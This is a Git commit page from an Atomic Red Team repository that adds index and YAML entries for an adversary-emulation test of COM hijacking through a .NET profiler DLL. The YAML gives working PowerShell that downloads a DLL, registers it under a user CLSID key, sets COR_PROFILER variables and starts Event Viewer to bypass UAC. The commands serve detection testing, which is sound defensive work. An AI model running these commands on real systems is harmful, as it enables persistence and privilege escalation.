security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-05-02 00:36:51 +00:00
parent 9b73020cee
commit 2bde901e95
10 changed files with 317 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+2
View File
@@ -14,6 +14,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
persistence,T1176,Browser Extensions,3,Firefox
persistence,T1042,Change Default File Association,1,Change Default File Association
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
persistence,T1136,Create Account,1,Create a user account on a Linux system
persistence,T1136,Create Account,2,Create a user account on a MacOS system
persistence,T1136,Create Account,3,Create a new user in a command prompt
@@ -103,6 +104,7 @@ defense-evasion,T1146,Clear Command History,6,Clear history of a bunch of shells
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
defense-evasion,T1223,Compiled HTML File,1,Compiled HTML Help Local Payload
defense-evasion,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
defense-evasion,T1090,Connection Proxy,1,Connection Proxy
defense-evasion,T1090,Connection Proxy,2,portproxy reg key
defense-evasion,T1196,Control Panel Items,1,Control Panel Items
1 Tactic Technique # Technique Name Test # Test Name
14 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store)
15 persistence T1176 Browser Extensions 3 Firefox
16 persistence T1042 Change Default File Association 1 Change Default File Association
17 persistence T1122 Component Object Model Hijacking 1 COM Hijack Leveraging .NET profiler DLL
18 persistence T1136 Create Account 1 Create a user account on a Linux system
19 persistence T1136 Create Account 2 Create a user account on a MacOS system
20 persistence T1136 Create Account 3 Create a new user in a command prompt
104 defense-evasion T1500 Compile After Delivery 1 Compile After Delivery using csc.exe
105 defense-evasion T1223 Compiled HTML File 1 Compiled HTML Help Local Payload
106 defense-evasion T1223 Compiled HTML File 2 Compiled HTML Help Remote Payload
107 defense-evasion T1122 Component Object Model Hijacking 1 COM Hijack Leveraging .NET profiler DLL
108 defense-evasion T1090 Connection Proxy 1 Connection Proxy
109 defense-evasion T1090 Connection Proxy 2 portproxy reg key
110 defense-evasion T1196 Control Panel Items 1 Control Panel Items
atomics/Indexes/Indexes-CSV/windows-index.csv
+2
View File
@@ -13,6 +13,7 @@ defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
defense-evasion,T1223,Compiled HTML File,1,Compiled HTML Help Local Payload
defense-evasion,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
defense-evasion,T1090,Connection Proxy,2,portproxy reg key
defense-evasion,T1196,Control Panel Items,1,Control Panel Items
defense-evasion,T1207,DCShadow,1,DCShadow - Mimikatz
@@ -166,6 +167,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
persistence,T1176,Browser Extensions,3,Firefox
persistence,T1042,Change Default File Association,1,Change Default File Association
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
persistence,T1136,Create Account,3,Create a new user in a command prompt
persistence,T1136,Create Account,4,Create a new user in PowerShell
persistence,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
1 Tactic Technique # Technique Name Test # Test Name
13 defense-evasion T1500 Compile After Delivery 1 Compile After Delivery using csc.exe
14 defense-evasion T1223 Compiled HTML File 1 Compiled HTML Help Local Payload
15 defense-evasion T1223 Compiled HTML File 2 Compiled HTML Help Remote Payload
16 defense-evasion T1122 Component Object Model Hijacking 1 COM Hijack Leveraging .NET profiler DLL
17 defense-evasion T1090 Connection Proxy 2 portproxy reg key
18 defense-evasion T1196 Control Panel Items 1 Control Panel Items
19 defense-evasion T1207 DCShadow 1 DCShadow - Mimikatz
167 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store)
168 persistence T1176 Browser Extensions 3 Firefox
169 persistence T1042 Change Default File Association 1 Change Default File Association
170 persistence T1122 Component Object Model Hijacking 1 COM Hijack Leveraging .NET profiler DLL
171 persistence T1136 Create Account 3 Create a new user in a command prompt
172 persistence T1136 Create Account 4 Create a new user in PowerShell
173 persistence T1038 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll
atomics/Indexes/Indexes-Markdown/index.md
+4 -2
View File
@@ -27,7 +27,8 @@
- [T1042 Change Default File Association](../../T1042/T1042.md)
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1136 Create Account](../../T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
@@ -180,7 +181,8 @@
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1090 Connection Proxy](../../T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+4 -2
View File
@@ -23,7 +23,8 @@
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1090 Connection Proxy](../../T1090/T1090.md)
- Atomic Test #2: portproxy reg key [windows]
- [T1196 Control Panel Items](../../T1196/T1196.md)
@@ -265,7 +266,8 @@
- [T1042 Change Default File Association](../../T1042/T1042.md)
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1136 Create Account](../../T1136/T1136.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
atomics/Indexes/Matrices/matrix.md
+2 -2
View File
@@ -12,8 +12,8 @@
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [Emond](../../T1519/T1519.md) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | [Email Collection](../../T1114/T1114.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Input Capture](../../T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File System Permissions Weakness](../../T1044/T1044.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [File System Permissions Weakness](../../T1044/T1044.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Launchctl](../../T1152/T1152.md) | [Create Account](../../T1136/T1136.md) | [Hooking](../../T1179/T1179.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Local Job Scheduling](../../T1168/T1168.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [DCShadow](../../T1207/T1207.md) | [Keychain](../../T1142/T1142.md) | [Query Registry](../../T1012/T1012.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | [Mshta](../../T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1160/T1160.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote Access Tools](../../T1219/T1219.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
atomics/Indexes/Matrices/windows-matrix.md
+2 -2
View File
@@ -10,9 +10,9 @@
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Email Collection](../../T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | [File System Permissions Weakness](../../T1044/T1044.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | [File System Permissions Weakness](../../T1044/T1044.md) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](../../T1170/T1170.md) | [Create Account](../../T1136/T1136.md) | [New Service](../../T1050/T1050.md) | [DCShadow](../../T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [PowerShell](../../T1086/T1086.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Parent PID Spoofing](../../T1502/T1502.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote System Discovery](../../T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](../../T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1073/T1073.md) | [Password Filter DLL](../../T1174/T1174.md) | [Security Software Discovery](../../T1063/T1063.md) | [Windows Admin Shares](../../T1077/T1077.md) | | | [Remote Access Tools](../../T1219/T1219.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
atomics/Indexes/index.yaml
+232
View File
@@ -1098,6 +1098,122 @@ persistence:
cleanup_command: 'assoc .hta=htafile
'
T1122:
technique:
x_mitre_permissions_required:
- User
x_mitre_data_sources:
- Windows Registry
- DLL monitoring
- Loaded DLLs
name: Component Object Model Hijacking
description: 'The Component Object Model (COM) is a system within Windows to
enable interaction between software components through the operating system.
(Citation: Microsoft Component Object Model) Adversaries can use this system
to insert malicious code that can be executed in place of legitimate software
through hijacking the COM references and relationships as a means for persistence.
Hijacking a COM object requires a change in the Windows Registry to replace
a reference to a legitimate system component which may cause that component
to not work when executed. When that system component is executed through
normal system operation the adversary''s code will be executed instead. (Citation:
GDATA COM Hijacking) An adversary is likely to hijack objects that are used
frequently enough to maintain a consistent level of persistence, but are unlikely
to break noticeable functionality within the system as to avoid system instability
that could lead to detection.'
id: attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69
modified: '2019-04-18T16:41:28.889Z'
x_mitre_platforms:
- Windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
type: attack-pattern
x_mitre_detection: 'There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
replacing know binary paths with unknown paths. Even though some third party
applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\Software\Classes\CLSID\</code>
may be anomalous and should be investigated since user objects will be loaded
prior to machine objects in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\</code>.
(Citation: Endgame COM Hijacking) Registry entries for existing COM objects
may change infrequently. When an entry with a known good path and binary is
replaced or changed to an unusual value to point to an unknown binary in a
new location, then it may indicate suspicious behavior and should be investigated.
Likewise, if software DLL loads are collected and analyzed, any unusual DLL
load that can be correlated with a COM object Registry modification may indicate
COM hijacking has been performed.'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- ENDGAME
created: '2017-05-31T21:31:33.979Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
external_references:
- external_id: T1122
source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1122
- source_name: Microsoft Component Object Model
description: Microsoft. (n.d.). The Component Object Model. Retrieved August
18, 2016.
url: https://msdn.microsoft.com/library/ms694363.aspx
- source_name: GDATA COM Hijacking
description: 'G DATA. (2014, October). COM Object hijacking: the discreet
way of persistence. Retrieved August 13, 2016.'
url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
- source_name: Endgame COM Hijacking
description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting
Persistence & Evasion with the COM. Retrieved September 15, 2016.'
url: https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com
x_mitre_defense_bypassed:
- Autoruns Analysis
identifier: T1122
atomic_tests:
- name: COM Hijack Leveraging .NET profiler DLL
description: "Creates environment variables and CLSID to enable a .NET profiler.
The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by
the Event Viewer process. Additionally, the profiling DLL will inherit the
integrity level of Event Viewer bypassing UAC and executing `notepad.exe`
with high integrity. If the account used is not a local administrator the
profiler DLL will still execute each time the CLR is loaded by a process,
however, the notepad process will not execute with high integrity. \n"
supported_platforms:
- windows
input_arguments:
file_name:
description: profiler DLL
type: Path
default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
clsid_guid:
description: custom clsid guid
type: String
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: "#{file_name} must be present"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
executor:
name: powershell
elevation_required: false
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
cleanup_command: |-
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
T1136:
technique:
x_mitre_permissions_required:
@@ -6308,6 +6424,122 @@ defense-evasion:
command: 'hh.exe #{remote_chm_file}
'
T1122:
technique:
x_mitre_permissions_required:
- User
x_mitre_data_sources:
- Windows Registry
- DLL monitoring
- Loaded DLLs
name: Component Object Model Hijacking
description: 'The Component Object Model (COM) is a system within Windows to
enable interaction between software components through the operating system.
(Citation: Microsoft Component Object Model) Adversaries can use this system
to insert malicious code that can be executed in place of legitimate software
through hijacking the COM references and relationships as a means for persistence.
Hijacking a COM object requires a change in the Windows Registry to replace
a reference to a legitimate system component which may cause that component
to not work when executed. When that system component is executed through
normal system operation the adversary''s code will be executed instead. (Citation:
GDATA COM Hijacking) An adversary is likely to hijack objects that are used
frequently enough to maintain a consistent level of persistence, but are unlikely
to break noticeable functionality within the system as to avoid system instability
that could lead to detection.'
id: attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69
modified: '2019-04-18T16:41:28.889Z'
x_mitre_platforms:
- Windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
type: attack-pattern
x_mitre_detection: 'There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
replacing know binary paths with unknown paths. Even though some third party
applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\Software\Classes\CLSID\</code>
may be anomalous and should be investigated since user objects will be loaded
prior to machine objects in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\</code>.
(Citation: Endgame COM Hijacking) Registry entries for existing COM objects
may change infrequently. When an entry with a known good path and binary is
replaced or changed to an unusual value to point to an unknown binary in a
new location, then it may indicate suspicious behavior and should be investigated.
Likewise, if software DLL loads are collected and analyzed, any unusual DLL
load that can be correlated with a COM object Registry modification may indicate
COM hijacking has been performed.'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- ENDGAME
created: '2017-05-31T21:31:33.979Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
external_references:
- external_id: T1122
source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1122
- source_name: Microsoft Component Object Model
description: Microsoft. (n.d.). The Component Object Model. Retrieved August
18, 2016.
url: https://msdn.microsoft.com/library/ms694363.aspx
- source_name: GDATA COM Hijacking
description: 'G DATA. (2014, October). COM Object hijacking: the discreet
way of persistence. Retrieved August 13, 2016.'
url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
- source_name: Endgame COM Hijacking
description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting
Persistence & Evasion with the COM. Retrieved September 15, 2016.'
url: https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com
x_mitre_defense_bypassed:
- Autoruns Analysis
identifier: T1122
atomic_tests:
- name: COM Hijack Leveraging .NET profiler DLL
description: "Creates environment variables and CLSID to enable a .NET profiler.
The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by
the Event Viewer process. Additionally, the profiling DLL will inherit the
integrity level of Event Viewer bypassing UAC and executing `notepad.exe`
with high integrity. If the account used is not a local administrator the
